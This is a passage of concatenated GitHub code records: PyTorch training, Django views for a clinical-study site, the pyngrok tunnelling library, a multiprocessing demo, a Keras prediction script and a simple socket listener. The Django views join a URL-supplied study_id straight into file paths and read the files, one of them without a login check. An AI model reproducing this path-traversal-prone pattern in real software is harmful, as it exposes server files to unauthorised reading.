loss_test)\nplt.plot(loss_train, label='Training loss')\nplt.plot(loss_test, label='Test loss')\nplt.legend(frameon=False)\nplt.show()\n\nprint(accuracy_train, accuracy_test)\nplt.plot(accuracy_train, label='Train Accuracy')\nplt.plot(accuracy_test, label='Test Accuracy')\nplt.legend(frameon=False)\nplt.show()\n\n","repo_name":"Ikrom-coder/AI-classification-with-pytorch","sub_path":"resnet50.py","file_name":"resnet50.py","file_ext":"py","file_size_in_byte":7970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3189211479","text":"import os\r\nimport xml\r\n\r\nfrom django.contrib import messages\r\nfrom django.contrib.auth import authenticate, login, logout\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.contrib.auth.forms import AuthenticationForm\r\nfrom 
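A note on the ResNet record above: the fully connected layer's input size of 1024 follows from the 150x150 center crops. With padding-1 3x3 convolutions: 150 -> 150 (stride-1 stem and layer1), 150 -> 75 (layer2, stride 2), 75 -> 38 (layer3, stride 2), then AvgPool2d(8) gives floor(38/8) = 4, and 64 channels x 4 x 4 = 1024 features.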
django.http import HttpResponse\r\nfrom django.shortcuts import render, redirect\r\nimport xml.etree.ElementTree as ET\r\n\r\nfrom .settings import BASE_DIR\r\nfrom .decorators import unauthenticated_user, allowed_users\r\nfrom .forms import Display_Form\r\nfrom .models import Display_File, Request_File\r\n\r\nFILE_TYPES = ['txt', 'xml']\r\n\r\n\r\n@login_required\r\ndef upload(request):\r\n form = Display_Form()\r\n if request.method == 'POST':\r\n form = Display_Form(request.POST, request.FILES)\r\n if form.is_valid():\r\n user_pr = form.save(commit=False)\r\n user_pr.display_file = request.FILES['display_file']\r\n file_type = user_pr.display_file.url.split('.')[-1]\r\n file_type = file_type.lower()\r\n if file_type not in FILE_TYPES:\r\n return render(request, 'profile_maker/error.html')\r\n user_pr.save()\r\n return render(request, 'profile_maker/details.html', {'user_pr': user_pr})\r\n context = {\"form\": form}\r\n return render(request, 'profile_maker/create.html', context)\r\n\r\n\r\ndef index(request):\r\n # return render(request, \"index.html\", {})\r\n return render(request, \"registration/login.html\", {})\r\n\r\n\r\n@login_required\r\n@allowed_users(allowed_roles=['admin', 'patient', 'researcher'])\r\ndef homepage(request):\r\n tree = ET.parse(\"blockchain/static/dataset/SearchResults.xml\")\r\n\r\n all_studies = []\r\n\r\n for search_results_xml in tree.iter(\"search_results\"):\r\n for study_xml in search_results_xml.iter(\"study\"):\r\n study_json = {}\r\n study_json[\"id\"] = study_xml.find(\"url\").text.replace(\"https://ClinicalTrials.gov/show/\", \"\")\r\n\r\n for data in study_xml:\r\n if not data.text:\r\n study_json[data.tag] = data.text\r\n else:\r\n study_json[data.tag] = data.text.strip()\r\n\r\n all_studies.append(study_json)\r\n return render(request=request, template_name=\"homepage.html\", context={'all_studies': all_studies})\r\n\r\n\r\n@login_required(login_url='login')\r\ndef study(request, id):\r\n tree = ET.parse(\"blockchain/static/dataset/search_result/\" + id + \".xml\")\r\n content = tree.find(\"brief_summary\").find(\"textblock\").text\r\n\r\n return render(request=request, template_name=\"study.html\", context={'content': content})\r\n\r\n\r\n@login_required\r\n@allowed_users(allowed_roles=['admin', 'patient', 'researcher'])\r\ndef data_center(request):\r\n current_email = request.user.email\r\n print(current_email)\r\n user_studies_queryset = Display_File.objects.all()\r\n\r\n all_studies = []\r\n\r\n for user_study in user_studies_queryset:\r\n\r\n study_json = {}\r\n study_xml_filename = '/uploadedstudydetails/' + user_study.display_file.name\r\n\r\n study_json[\"file_name\"] = user_study.file_name\r\n study_json[\"display_file\"] = user_study.display_file\r\n study_json[\"email\"] = user_study.email\r\n study_json[\"display_file_path\"] = study_xml_filename\r\n\r\n study_json[\"is_link\"] = (user_study.email == current_email)\r\n\r\n all_studies.append(study_json)\r\n\r\n return render(request, \"data_center.html\", {'all_studies': all_studies})\r\n\r\n\r\n@login_required\r\ndef uploaded_study_detail(request, study_id):\r\n # print(study_id)\r\n file_path = 
os.path.join(BASE_DIR, 'blockchain\\\\media\\\\' + study_id)\r\n study_details = open(file_path).read()\r\n return render(request, \"uploadedstudydetails.html\", {'uploaded_study_details': study_details})\r\n\r\n\r\ndef study_detail(request, study_id):\r\n print(study_id)\r\n\r\n if study_id.endswith('.xml'):\r\n # process the xml file\r\n whatever = 123\r\n\r\n file_path = os.path.join(BASE_DIR, 'blockchain\\\\studies\\\\' + study_id)\r\n study_details = open(file_path).read()\r\n return render(request, \"studydetails.html\", {'study_details': study_details})\r\n\r\n\r\n@login_required\r\ndef requests(request):\r\n user_requests_queryset = Request_File.objects.all()\r\n\r\n all_requests = []\r\n\r\n for user_requests in user_requests_queryset:\r\n requests_json = {}\r\n\r\n requests_json[\"file_name\"] = user_requests.file_name\r\n requests_json[\"status\"] = user_requests.status\r\n requests_json[\"email\"] = user_requests.email\r\n\r\n all_requests.append(requests_json)\r\n # Pass the collected requests to the template (it was built but unused before)\r\n return render(request, \"requests.html\", {'all_requests': all_requests})\r\n\r\n","repo_name":"BlueJayADAL/SCARP2020-Blockchain","sub_path":"website/blockchain/blockchain/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"35385880660","text":"import json\nimport logging\nimport os\nimport socket\nimport sys\nimport uuid\nfrom http import HTTPStatus\nfrom typing import Optional, Any, Dict, List, Tuple\nfrom urllib.error import HTTPError, URLError\nfrom urllib.parse import urlencode\nfrom urllib.request import urlopen, Request\n\nfrom pyngrok import process, conf, installer\nfrom pyngrok.conf import PyngrokConfig\nfrom pyngrok.exception import PyngrokNgrokHTTPError, PyngrokNgrokURLError, PyngrokSecurityError, PyngrokError\nfrom pyngrok.installer import get_default_config\nfrom pyngrok.process import NgrokProcess\n\n__author__ = \"Alex Laird\"\n__copyright__ = \"Copyright 2023, Alex Laird\"\n__version__ = \"7.0.0\"\n\nlogger = logging.getLogger(__name__)\n\n\nclass NgrokTunnel:\n \"\"\"\n An object containing information about a ``ngrok`` tunnel.\n \"\"\"\n\n def __init__(self,\n data: Dict[str, Any],\n pyngrok_config: PyngrokConfig,\n api_url: Optional[str]) -> None:\n #: The original tunnel data.\n self.data: Dict[str, Any] = data\n #: The ``pyngrok`` configuration to use when interacting with the ``ngrok``.\n self.pyngrok_config: PyngrokConfig = pyngrok_config\n #: The API URL for the ``ngrok`` web interface.\n self.api_url: Optional[str] = api_url\n\n #: The ID of the tunnel.\n self.id: Optional[str] = data.get(\"ID\", None)\n #: The name of the tunnel.\n self.name: Optional[str] = data.get(\"name\")\n #: The protocol of the tunnel.\n self.proto: Optional[str] = data.get(\"proto\")\n #: The tunnel URI, a relative path that can be used to make requests to the ``ngrok`` web interface.\n self.uri: Optional[str] = data.get(\"uri\")\n #: The public ``ngrok`` URL.\n self.public_url: Optional[str] = data.get(\"public_url\")\n #: The config for the tunnel.\n self.config: Dict[str, Any] = data.get(\"config\", {})\n #: Metrics for `the tunnel `_.\n self.metrics: Dict[str, Any] = data.get(\"metrics\", {})\n\n def __repr__(self) -> str:\n return \"<NgrokTunnel: \\\"{}\\\" -> \\\"{}\\\">\".format(self.public_url, self.config[\"addr\"]) if self.config.get(\n \"addr\", None) else \"<NgrokTunnel>\"\n\n def __str__(self) -> str: # pragma: no cover\n return \"NgrokTunnel: \\\"{}\\\" -> \\\"{}\\\"\".format(self.public_url, self.config[\"addr\"]) if self.config.get(\n 
\"addr\", None) else \"\"\n\n def refresh_metrics(self) -> None:\n \"\"\"\n Get the latest metrics for the tunnel and update the ``metrics`` variable.\n \"\"\"\n logger.info(\"Refreshing metrics for tunnel: {}\".format(self.public_url))\n\n data = api_request(\"{}{}\".format(self.api_url, self.uri), method=\"GET\",\n timeout=self.pyngrok_config.request_timeout)\n\n if \"metrics\" not in data:\n raise PyngrokError(\"The ngrok API did not return \\\"metrics\\\" in the response\")\n\n self.data[\"metrics\"] = data[\"metrics\"]\n self.metrics = self.data[\"metrics\"]\n\n\n_current_tunnels: Dict[str, NgrokTunnel] = {}\n\n\ndef install_ngrok(pyngrok_config: Optional[PyngrokConfig] = None) -> None:\n \"\"\"\n Download, install, and initialize ``ngrok`` for the given config. If ``ngrok`` and its default\n config is already installed, calling this method will do nothing.\n\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n if not os.path.exists(pyngrok_config.ngrok_path):\n installer.install_ngrok(pyngrok_config.ngrok_path, ngrok_version=pyngrok_config.ngrok_version)\n\n config_path = conf.get_config_path(pyngrok_config)\n\n # Install the config to the requested path\n if not os.path.exists(config_path):\n installer.install_default_config(config_path, ngrok_version=pyngrok_config.ngrok_version)\n\n # Install the default config, even if we don't need it this time, if it doesn't already exist\n if conf.DEFAULT_NGROK_CONFIG_PATH != config_path and \\\n not os.path.exists(conf.DEFAULT_NGROK_CONFIG_PATH):\n installer.install_default_config(conf.DEFAULT_NGROK_CONFIG_PATH, ngrok_version=pyngrok_config.ngrok_version)\n\n\ndef set_auth_token(token: str,\n pyngrok_config: Optional[PyngrokConfig] = None) -> None:\n \"\"\"\n Set the ``ngrok`` auth token in the config file, enabling authenticated features (for instance,\n more concurrent tunnels, custom subdomains, etc.).\n\n If ``ngrok`` is not installed at :class:`~pyngrok.conf.PyngrokConfig`'s ``ngrok_path``, calling this method\n will first download and install ``ngrok``.\n\n :param token: The auth token to set.\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n install_ngrok(pyngrok_config)\n\n process.set_auth_token(pyngrok_config, token)\n\n\ndef get_ngrok_process(pyngrok_config: Optional[PyngrokConfig] = None) -> NgrokProcess:\n \"\"\"\n Get the current ``ngrok`` process for the given config's ``ngrok_path``.\n\n If ``ngrok`` is not installed at :class:`~pyngrok.conf.PyngrokConfig`'s ``ngrok_path``, calling this method\n will first download and install ``ngrok``.\n\n If ``ngrok`` is not running, calling this method will first start a process with\n :class:`~pyngrok.conf.PyngrokConfig`.\n\n Use :func:`~pyngrok.process.is_process_running` to check if a process is running without also implicitly\n installing and starting it.\n\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n :return: The ``ngrok`` process.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n install_ngrok(pyngrok_config)\n\n return process.get_process(pyngrok_config)\n\n\ndef 
_apply_cloud_edge_to_tunnel(tunnel: NgrokTunnel,\n pyngrok_config: PyngrokConfig) -> None:\n if not tunnel.public_url and pyngrok_config.api_key and tunnel.id:\n tunnel_response = api_request(\"https://api.ngrok.com/tunnels/{}\".format(tunnel.id), method=\"GET\",\n auth=pyngrok_config.api_key)\n if \"labels\" not in tunnel_response or \"edge\" not in tunnel_response[\"labels\"]:\n raise PyngrokError(\n \"Tunnel {} does not have \\\"labels\\\", use a Tunnel configured on Cloud Edge.\".format(tunnel.data[\"ID\"]))\n\n edge = tunnel_response[\"labels\"][\"edge\"]\n if edge.startswith(\"edghts_\"):\n edges_prefix = \"https\"\n elif edge.startswith(\"edgtcp\"):\n edges_prefix = \"tcp\"\n elif edge.startswith(\"edgtls\"):\n edges_prefix = \"tls\"\n else:\n raise PyngrokError(\"Unknown Edge prefix: {}.\".format(edge))\n\n edge_response = api_request(\"https://api.ngrok.com/edges/{}/{}\".format(edges_prefix, edge), method=\"GET\",\n auth=pyngrok_config.api_key)\n\n if \"hostports\" not in edge_response or len(edge_response[\"hostports\"]) < 1:\n raise PyngrokError(\n \"No Endpoint is attached to your Cloud Edge {}, login to the ngrok dashboard to attach an Endpoint to your Edge first.\".format(\n edge))\n\n tunnel.public_url = \"{}://{}\".format(edges_prefix, edge_response[\"hostports\"][0])\n tunnel.proto = edges_prefix\n\n\n# When Python <3.9 support is dropped, addr type can be changed to Optional[str|int]\ndef connect(addr: Optional[str] = None,\n proto: Optional[str] = None,\n name: Optional[str] = None,\n pyngrok_config: Optional[PyngrokConfig] = None,\n **options: Any) -> NgrokTunnel:\n \"\"\"\n Establish a new ``ngrok`` tunnel for the given protocol to the given port, returning an object representing\n the connected tunnel.\n\n If a `tunnel definition in ngrok's config file\n `_ matches the given\n ``name``, it will be loaded and used to start the tunnel. When ``name`` is ``None`` and a \"pyngrok-default\" tunnel\n definition exists in ``ngrok``'s config, it will be loaded and use. Any ``kwargs`` passed as ``options`` will\n override properties from the loaded tunnel definition.\n\n If ``ngrok`` is not installed at :class:`~pyngrok.conf.PyngrokConfig`'s ``ngrok_path``, calling this method\n will first download and install ``ngrok``.\n\n ``pyngrok`` is compatible with ``ngrok`` v2 and v3, but by default it will install v3. To install v2 instead,\n set ``ngrok_version`` to \"v2\" in :class:`~pyngrok.conf.PyngrokConfig`:\n\n If ``ngrok`` is not running, calling this method will first start a process with\n :class:`~pyngrok.conf.PyngrokConfig`.\n\n .. note::\n\n ``ngrok`` v2's default behavior for ``http`` when no additional properties are passed is to open *two* tunnels,\n one ``http`` and one ``https``. This method will return a reference to the ``http`` tunnel in this case. 
If\n only a single tunnel is needed, pass ``bind_tls=True`` and a reference to the ``https`` tunnel will be returned.\n\n :param addr: The local port to which the tunnel will forward traffic, or a\n `local directory or network address `_, defaults to \"80\".\n :param proto: A valid `tunnel protocol\n `_, defaults to \"http\".\n :param name: A friendly name for the tunnel, or the name of a `ngrok tunnel definition `_\n to be used.\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n :param options: Remaining ``kwargs`` are passed as `configuration for the ngrok\n tunnel `_.\n :return: The created ``ngrok`` tunnel.\n \"\"\"\n if \"labels\" in options:\n raise PyngrokError(\"\\\"labels\\\" cannot be passed to connect(), define a tunnel definition in the config file.\")\n\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n config_path = conf.get_config_path(pyngrok_config)\n\n if os.path.exists(config_path):\n config = installer.get_ngrok_config(config_path, ngrok_version=pyngrok_config.ngrok_version)\n else:\n config = get_default_config(pyngrok_config.ngrok_version)\n\n tunnel_definitions = config.get(\"tunnels\", {})\n # If a \"pyngrok-default\" tunnel definition exists in the ngrok config, use that\n if not name and \"pyngrok-default\" in tunnel_definitions:\n name = \"pyngrok-default\"\n\n # Use a tunnel definition for the given name, if it exists\n if name and name in tunnel_definitions:\n tunnel_definition = tunnel_definitions[name]\n\n if \"labels\" in tunnel_definition and \"bind_tls\" in options:\n raise PyngrokError(\"\\\"bind_tls\\\" cannot be set when \\\"labels\\\" is also on the tunnel definition.\")\n\n addr = tunnel_definition.get(\"addr\") if not addr else addr\n proto = tunnel_definition.get(\"proto\") if not proto else proto\n # Use the tunnel definition as the base, but override with any passed in options\n tunnel_definition.update(options)\n options = tunnel_definition\n\n if \"labels\" in options and not pyngrok_config.api_key:\n raise PyngrokError(\n \"\\\"PyngrokConfig.api_key\\\" must be set when \\\"labels\\\" is on the tunnel definition.\")\n\n addr = str(addr) if addr else \"80\"\n # Only apply a default proto label if \"labels\" isn't defined\n if not proto and \"labels\" not in options:\n proto = \"http\"\n\n if not name:\n if not addr.startswith(\"file://\"):\n name = \"{}-{}-{}\".format(proto, addr, uuid.uuid4())\n else:\n name = \"{}-file-{}\".format(proto, uuid.uuid4())\n\n logger.info(\"Opening tunnel named: {}\".format(name))\n\n config = {\n \"name\": name,\n \"addr\": addr\n }\n options.update(config)\n\n # Only apply proto when \"labels\" is not defined\n if \"labels\" not in options:\n options[\"proto\"] = proto\n\n # Upgrade legacy parameters, if present\n if pyngrok_config.ngrok_version == \"v3\":\n if \"bind_tls\" in options:\n if options.get(\"bind_tls\") is True or options.get(\"bind_tls\") == \"true\":\n options[\"schemes\"] = [\"https\"]\n elif options.get(\"bind_tls\") is False or options.get(\"bind_tls\") == \"false\":\n options[\"schemes\"] = [\"http\"]\n else:\n options[\"schemes\"] = [\"http\", \"https\"]\n\n options.pop(\"bind_tls\")\n\n if \"auth\" in options:\n auth = options.get(\"auth\")\n if isinstance(auth, list):\n options[\"basic_auth\"] = auth\n else:\n options[\"basic_auth\"] = [auth]\n\n options.pop(\"auth\")\n\n api_url = get_ngrok_process(pyngrok_config).api_url\n\n logger.debug(\"Creating tunnel 
with options: {}\".format(options))\n\n tunnel = NgrokTunnel(api_request(\"{}/api/tunnels\".format(api_url), method=\"POST\", data=options,\n timeout=pyngrok_config.request_timeout),\n pyngrok_config, api_url)\n\n if pyngrok_config.ngrok_version == \"v2\" and proto == \"http\" and options.get(\"bind_tls\", \"both\") == \"both\":\n tunnel = NgrokTunnel(api_request(\"{}{}%20%28http%29\".format(api_url, tunnel.uri), method=\"GET\",\n timeout=pyngrok_config.request_timeout),\n pyngrok_config, api_url)\n\n _apply_cloud_edge_to_tunnel(tunnel, pyngrok_config)\n\n if tunnel.public_url is None:\n raise PyngrokError(\n \"\\\"public_url\\\" was not populated for tunnel {}, but is required for pyngrok to function.\".format(\n tunnel))\n\n _current_tunnels[tunnel.public_url] = tunnel\n\n return tunnel\n\n\ndef disconnect(public_url: str,\n pyngrok_config: Optional[PyngrokConfig] = None) -> None:\n \"\"\"\n Disconnect the ``ngrok`` tunnel for the given URL, if open.\n\n :param public_url: The public URL of the tunnel to disconnect.\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n # If ngrok is not running, there are no tunnels to disconnect\n if not process.is_process_running(pyngrok_config.ngrok_path):\n return\n\n api_url = get_ngrok_process(pyngrok_config).api_url\n\n if public_url not in _current_tunnels:\n get_tunnels(pyngrok_config)\n\n # One more check, if the given URL is still not in the list of tunnels, it is not active\n if public_url not in _current_tunnels:\n return\n\n tunnel = _current_tunnels[public_url]\n\n logger.info(\"Disconnecting tunnel: {}\".format(tunnel.public_url))\n\n api_request(\"{}{}\".format(api_url, tunnel.uri), method=\"DELETE\",\n timeout=pyngrok_config.request_timeout)\n\n _current_tunnels.pop(public_url, None)\n\n\ndef get_tunnels(pyngrok_config: Optional[PyngrokConfig] = None) -> List[NgrokTunnel]:\n \"\"\"\n Get a list of active ``ngrok`` tunnels for the given config's ``ngrok_path``.\n\n If ``ngrok`` is not installed at :class:`~pyngrok.conf.PyngrokConfig`'s ``ngrok_path``, calling this method\n will first download and install ``ngrok``.\n\n If ``ngrok`` is not running, calling this method will first start a process with\n :class:`~pyngrok.conf.PyngrokConfig`.\n\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n :return: The active ``ngrok`` tunnels.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n api_url = get_ngrok_process(pyngrok_config).api_url\n\n _current_tunnels.clear()\n for tunnel in api_request(\"{}/api/tunnels\".format(api_url), method=\"GET\",\n timeout=pyngrok_config.request_timeout)[\"tunnels\"]:\n ngrok_tunnel = NgrokTunnel(tunnel, pyngrok_config, api_url)\n _apply_cloud_edge_to_tunnel(ngrok_tunnel, pyngrok_config)\n\n if ngrok_tunnel.public_url is None:\n raise PyngrokError(\n \"\\\"public_url\\\" was not populated for tunnel {}, but is required for pyngrok to function.\".format(\n ngrok_tunnel))\n\n _current_tunnels[ngrok_tunnel.public_url] = ngrok_tunnel\n\n return list(_current_tunnels.values())\n\n\ndef kill(pyngrok_config: Optional[PyngrokConfig] = None) -> None:\n \"\"\"\n Terminate the ``ngrok`` processes, if running, for the given config's ``ngrok_path``. 
This method will not\n block, it will just issue a kill request.\n\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n process.kill_process(pyngrok_config.ngrok_path)\n\n _current_tunnels.clear()\n\n\ndef get_version(pyngrok_config: Optional[PyngrokConfig] = None) -> Tuple[str, str]:\n \"\"\"\n Get a tuple with the ``ngrok`` and ``pyngrok`` versions.\n\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n :return: A tuple of ``(ngrok_version, pyngrok_version)``.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n ngrok_version = process.capture_run_process(pyngrok_config.ngrok_path, [\"--version\"]).split(\"version \")[1]\n\n return ngrok_version, __version__\n\n\ndef update(pyngrok_config: Optional[PyngrokConfig] = None) -> str:\n \"\"\"\n Update ``ngrok`` for the given config's ``ngrok_path``, if an update is available.\n\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n :return: The result from the ``ngrok`` update.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n return process.capture_run_process(pyngrok_config.ngrok_path, [\"update\"])\n\n\ndef api_request(url: str,\n method: str = \"GET\",\n data: Optional[Dict[str, Any]] = None,\n params: Optional[Dict[str, Any]] = None,\n timeout: float = 4,\n auth: Optional[str] = None) -> Dict[str, Any]:\n \"\"\"\n Invoke an API request to the given URL, returning JSON data from the response.\n\n One use for this method is making requests to ``ngrok`` tunnels:\n\n .. code-block:: python\n\n from pyngrok import ngrok\n\n public_url = ngrok.connect()\n response = ngrok.api_request(\"{}/some-route\".format(public_url),\n method=\"POST\", data={\"foo\": \"bar\"})\n\n Another is making requests to the ``ngrok`` API itself:\n\n .. 
code-block:: python\n\n from pyngrok import ngrok\n\n api_url = ngrok.get_ngrok_process().api_url\n response = ngrok.api_request(\"{}/api/requests/http\".format(api_url),\n params={\"tunnel_name\": \"foo\"})\n\n :param url: The request URL.\n :param method: The HTTP method.\n :param data: The request body.\n :param params: The URL parameters.\n :param timeout: The request timeout, in seconds.\n :param auth: Set as Bearer for an Authorization header.\n :return: The response from the request.\n \"\"\"\n if params is None:\n params = {}\n\n if not url.lower().startswith(\"http\"):\n raise PyngrokSecurityError(\"URL must start with \\\"http\\\": {}\".format(url))\n\n encoded_data = json.dumps(data).encode(\"utf-8\") if data else None\n\n if params:\n url += \"?{}\".format(urlencode([(x, params[x]) for x in params]))\n\n request = Request(url, method=method.upper())\n request.add_header(\"Content-Type\", \"application/json\")\n if auth:\n request.add_header(\"Ngrok-Version\", \"2\")\n request.add_header(\"Authorization\", \"Bearer {}\".format(auth))\n\n logger.debug(\"Making {} request to {} with data: {}\".format(method, url, data))\n\n try:\n response = urlopen(request, encoded_data, timeout)\n response_data = response.read().decode(\"utf-8\")\n\n status_code = response.getcode()\n logger.debug(\"Response {}: {}\".format(status_code, response_data.strip()))\n\n if str(status_code)[0] != \"2\":\n raise PyngrokNgrokHTTPError(\"ngrok client API returned {}: {}\".format(status_code, response_data), url,\n status_code, None, request.headers, response_data)\n elif status_code == HTTPStatus.NO_CONTENT:\n return {}\n\n return json.loads(response_data)\n except socket.timeout:\n raise PyngrokNgrokURLError(\"ngrok client exception, URLError: timed out\", \"timed out\")\n except HTTPError as e:\n response_data = e.read().decode(\"utf-8\")\n\n status_code = e.getcode()\n logger.debug(\"Response {}: {}\".format(status_code, response_data.strip()))\n\n raise PyngrokNgrokHTTPError(\"ngrok client exception, API returned {}: {}\".format(status_code, response_data),\n e.url,\n status_code, e.reason, e.headers, response_data)\n except URLError as e:\n raise PyngrokNgrokURLError(\"ngrok client exception, URLError: {}\".format(e.reason), e.reason)\n\n\ndef run(args: Optional[List[str]] = None,\n pyngrok_config: Optional[PyngrokConfig] = None) -> None:\n \"\"\"\n Ensure ``ngrok`` is installed at the default path, then call :func:`~pyngrok.process.run_process`.\n\n This method is meant for interacting with ``ngrok`` from the command line and is not necessarily\n compatible with non-blocking API methods. For that, use :mod:`~pyngrok.ngrok`'s interface methods (like\n :func:`~pyngrok.ngrok.connect`), or use :func:`~pyngrok.process.get_process`.\n\n :param args: Arguments to be passed to the ``ngrok`` process.\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n \"\"\"\n if args is None:\n args = []\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n install_ngrok(pyngrok_config)\n\n process.run_process(pyngrok_config.ngrok_path, args)\n\n\ndef main() -> None:\n \"\"\"\n Entry point for the package's ``console_scripts``. This initializes a call from the command\n line and invokes :func:`~pyngrok.ngrok.run`.\n\n This method is meant for interacting with ``ngrok`` from the command line and is not necessarily\n compatible with non-blocking API methods. 
For that, use :mod:`~pyngrok.ngrok`'s interface methods (like\n :func:`~pyngrok.ngrok.connect`), or use :func:`~pyngrok.process.get_process`.\n \"\"\"\n run(sys.argv[1:])\n\n if len(sys.argv) == 1 or len(sys.argv) == 2 and sys.argv[1].lstrip(\"-\").lstrip(\"-\") == \"help\":\n print(\"\\nPYNGROK VERSION:\\n {}\".format(__version__))\n elif len(sys.argv) == 2 and sys.argv[1].lstrip(\"-\").lstrip(\"-\") in [\"v\", \"version\"]:\n print(\"pyngrok version {}\".format(__version__))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alexdlaird/pyngrok","sub_path":"pyngrok/ngrok.py","file_name":"ngrok.py","file_ext":"py","file_size_in_byte":23923,"program_lang":"python","lang":"en","doc_type":"code","stars":374,"dataset":"github-code","pt":"53"} +{"seq_id":"25536085202","text":"\"\"\"\nMultiprocessing using python\n\"\"\"\nfrom multiprocessing import Process\n\n\ndef print_func(value='default_value'):\n print(f\"This function print {value}\")\n\n\nif __name__ == '__main__':\n names = ['chetan', 'vinay', 'parth']\n procs = []\n proc = Process(target=print_func) # instantiating without any argument\n procs.append(proc)\n proc.start()\n\n # instantiating process with arguments\n for name in names:\n # print(name)\n proc = Process(target=print_func, args=(name,))\n procs.append(proc)\n proc.start()\n\n # complete the processes\n for proc in procs:\n proc.join()\n\n\n\"\"\"\nOutput:\nThis function print default_value\nThis function print chetan\nThis function print vinay\nThis function print parth\n\"\"\"","repo_name":"chetanghadawaje/pythonBasic","sub_path":"Multiprocessing/basic_multiprocessing.py","file_name":"basic_multiprocessing.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31151115920","text":"from keras.models import load_model\nfrom keras.preprocessing.image import ImageDataGenerator\nimport pandas as pd\nimport numpy as np\n\nIMG_SIZE = 224\nBATCH_SIZE = 64\n\ndatagen = ImageDataGenerator(rescale=1.0/255)\ntest_gen_s1 = datagen.flow_from_directory('test_data/s1/',\n\t\t\t\t\ttarget_size = (IMG_SIZE,IMG_SIZE),\n\t\t\t\t\tbatch_size = BATCH_SIZE,\n\t\t\t\t\tclass_mode='categorical')\ntest_gen_s2 = datagen.flow_from_directory('test_data/s2/',\n target_size = (IMG_SIZE,IMG_SIZE),\n batch_size = BATCH_SIZE,\n class_mode='categorical')\nmodel_1 = load_model('vgg_model_best_1.h5')\nmodel_2 = load_model('vgg_model_best_2.h5')\nprint('model loaded')\nsteps_ = (39794//2) // BATCH_SIZE\npredictions_s1 = model_1.predict_generator(test_gen_s1,steps = steps_+1,verbose = 1)\nprint(predictions_s1.shape)\n\npredictions_s2 = model_2.predict_generator(test_gen_s2,steps = steps_+1,verbose = 1)\nprint(predictions_s2.shape)\nnp.save('predictions_s1.npy',predictions_s1)\nnp.save('predictions_s2.npy',predictions_s2)\n\nfilenames_1 = test_gen_s1.filenames\nfilenames_2 = test_gen_s2.filenames\n\ndf = pd.DataFrame()\ndf['filename_s1'] = filenames_1\ndf['prediction_s1'] = predictions_s1\ndf['filename_s2'] = filenames_2\ndf['prediction_s2'] = predictions_s2\ndf.to_csv('predictions_ensemble.csv',index =False)\n","repo_name":"RamjiB/Recursive-Cellular-Image-Classification","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34188402990","text":"import socket\r\nimport time\r\n\r\nHOST = '127.0.0.1'\r\nPORT = 5000\r\n\r\ndef main():\r\n with 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\r\n s.bind((HOST, PORT))\r\n s.listen()\r\n print(f\"Listening on port {PORT}...\")\r\n conn, addr = s.accept()\r\n with conn:\r\n print('Connected by', addr)\r\n while True:\r\n data = conn.recv(1024)\r\n if not data:\r\n break\r\n message = data.decode()\r\n if message == \"stop\":\r\n print(\"Received stop message. Stopping machine...\")\r\n break\r\n else:\r\n print(f\"Received unknown message: {message}\")\r\n\r\nwhile True:\r\n main()\r\n time.sleep(1)\r\n","repo_name":"D3ATHWI3H/ML-Cnc-Tool-Crack","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15638152229","text":"from datetime import date\n\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import FieldError\n\nfrom clone.models import (\n Attendence\n)\n\n\nclass DatesTest(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.user = User.objects.create(\n username='admin', email=\"admin@gmail.com\", first_name=\"harshit\", last_name=\"chandani\")\n cls.user.set_password(\"admin\")\n cls.user.save()\n\n def setUp(self):\n Attendence.objects.create(\n user=self.user,\n 